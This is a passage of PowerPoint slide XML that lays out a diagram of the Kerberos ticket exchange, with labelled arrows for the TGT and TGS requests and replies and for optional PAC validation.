            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="9229180" y="1038537"/>
            <a:ext cx="585218" cy="585218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EB8C559-BC4D-416C-AC0B-99642283F835}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9957175" y="725282"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Picture 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{366B0B42-8264-48E9-8A3E-294300102A6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1859530" y="2583231"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Picture 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D56AEB47-0CE5-4137-84B5-39C200A366C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="9229180" y="627733"/>
            <a:ext cx="585242" cy="585242"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Picture 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{375D4B21-E3E0-4658-BDC2-A1FBA3F38932}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079240" y="3227835"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39" name="Picture 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F71A077-574D-41A8-9262-753E2727C214}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079240" y="2193086"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="42" name="Picture 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{841B6DC2-1588-4D79-8E5A-C7AA3647ADA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9336294" y="4323724"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43" name="Picture 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05E935F3-B697-403A-BCC3-99D65F8EF829}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8859744" y="4713869"/>
            <a:ext cx="585218" cy="585218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="44" name="Picture 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB5BB2A9-FFC4-47E5-96CF-662738A41B4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1664433" y="3154127"/>
            <a:ext cx="585242" cy="585242"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="Picture 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{636E3B25-6DF4-413F-8F3A-98E90CF3FCC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9957175" y="1212241"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46" name="Picture 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D49D8368-059D-49ED-B859-A99B060563FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8902946" y="4323724"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="48" name="Picture 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87E105EB-92E0-497B-9334-FAE52F467FF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6548504" y="3037295"/>
            <a:ext cx="758011" cy="873120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CECDF310-845F-40AB-87EF-977ACB9DC671}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3226530" y="1227401"/>
            <a:ext cx="5271247" cy="1682278"/>
            <a:chOff x="3045555" y="894026"/>
            <a:chExt cx="5271247" cy="1682278"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="6" name="Straight Arrow Connector 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56738D1F-B76C-4536-B27B-7C943090F787}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="3045555" y="894026"/>
              <a:ext cx="5271247" cy="1682278"/>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BDC64F-C78C-4EC8-92F4-0CF83CDD26A4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20530726">
              <a:off x="4193674" y="1405912"/>
              <a:ext cx="2743200" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>AS_REQ (request TGT)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4050062-9873-4FB6-9F2B-AAC6AD8B777E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3377888" y="1639660"/>
            <a:ext cx="5190242" cy="1599172"/>
            <a:chOff x="3196913" y="1306285"/>
            <a:chExt cx="5190242" cy="1599172"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="30" name="Straight Arrow Connector 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8B00F27-22F7-4069-9880-E02010ABAB1A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3196913" y="1306285"/>
              <a:ext cx="5190242" cy="1599172"/>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D762194-1087-4543-A897-7D7E6180AB20}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20530726">
              <a:off x="4344755" y="1717200"/>
              <a:ext cx="2743200" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>AS_REP (receive TGT)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B47BF69-9B1F-44D1-A5DC-74CFCDDD8520}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3501511" y="1961012"/>
            <a:ext cx="5271247" cy="1682278"/>
            <a:chOff x="3320536" y="1627637"/>
            <a:chExt cx="5271247" cy="1682278"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="32" name="Straight Arrow Connector 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C1E303F-1C33-44AF-B398-A1E42D76C4D4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="3320536" y="1627637"/>
              <a:ext cx="5271247" cy="1682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A76F2DF-CBB7-4F2C-8024-54C0BC93FD9E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20530726">
              <a:off x="3890252" y="1966409"/>
              <a:ext cx="4642500" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>TGS_REQ (present TGT, request TGS)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96C248EB-F772-48F9-A5EF-1D535A53F2F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3652869" y="2373271"/>
            <a:ext cx="5190242" cy="1599172"/>
            <a:chOff x="3471894" y="2039896"/>
            <a:chExt cx="5190242" cy="1599172"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="34" name="Straight Arrow Connector 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17EE7E12-93E7-42DF-A80D-E4F326DBA9CE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3471894" y="2039896"/>
              <a:ext cx="5190242" cy="1599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C32F8D4-3E06-46E3-A23A-59F7D85C6EAA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20530726">
              <a:off x="4611779" y="2400062"/>
              <a:ext cx="3074839" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>TGS_REP (TGS response)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E23493B-BEBF-4A24-BEF5-F87E5587F20A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2398696" y="3758258"/>
            <a:ext cx="5271247" cy="1682278"/>
            <a:chOff x="2398696" y="3758258"/>
            <a:chExt cx="5271247" cy="1682278"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="36" name="Straight Arrow Connector 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F51800C-3F11-4E7A-AB9E-D1BE443E8827}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="1450539" flipV="1">
              <a:off x="2398696" y="3758258"/>
              <a:ext cx="5271247" cy="1682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FF7D9EA-F682-48C4-8EC6-D6C91D2C0991}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="381265">
              <a:off x="3721427" y="4188518"/>
              <a:ext cx="2663618" cy="373170"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>AS_REQ (present TGS)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F535996-1243-41AF-B40A-D53B0C1375C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2550054" y="4215121"/>
            <a:ext cx="5319830" cy="1599172"/>
            <a:chOff x="2550054" y="4215121"/>
            <a:chExt cx="5319830" cy="1599172"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="40" name="Straight Arrow Connector 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{498F2C12-70EF-41AB-A3CB-3D3DE828EAE1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="1450539" flipH="1">
              <a:off x="2550054" y="4215121"/>
              <a:ext cx="5190242" cy="1599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40E178-A7CA-4DBA-88B6-CFB0378EE955}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="435642">
              <a:off x="2691229" y="4648010"/>
              <a:ext cx="5178655" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>AS_REP (optional, for mutual authentication)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="47" name="Picture 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30FFA3C7-C725-4AE1-8A4B-E07B5B8DB2A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1665091" y="3677366"/>
            <a:ext cx="585218" cy="585218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Straight Arrow Connector 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F5B7718-EA42-4376-952E-C9964D286EE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9229180" y="1602386"/>
            <a:ext cx="0" cy="2384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FDAAE7-0E4C-4F9E-8BB3-78EC73E39D03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9263141" y="2039896"/>
            <a:ext cx="2332099" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Optional PAC validation Request/Response</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49" name="Picture 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CB987B3-807E-414B-8FFD-4187C36D1A82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId13"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9953647" y="1669441"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="50" name="Group 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3D61540-DC03-44A1-8741-932FC8C5B903}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2897659" y="585706"/>
            <a:ext cx="5271247" cy="1682278"/>
            <a:chOff x="3045555" y="894026"/>
            <a:chExt cx="5271247" cy="1682278"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="51" name="Straight Arrow Connector 50">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D8D8511-4A08-42CA-B5A4-222AA8E1FA10}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="3045555" y="894026"/>
              <a:ext cx="5271247" cy="1682278"/>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21C91D3-A3E5-4035-91FE-4988FBDEE9E0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20530726">
              <a:off x="4193674" y="1405912"/>
              <a:ext cx="2743200" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
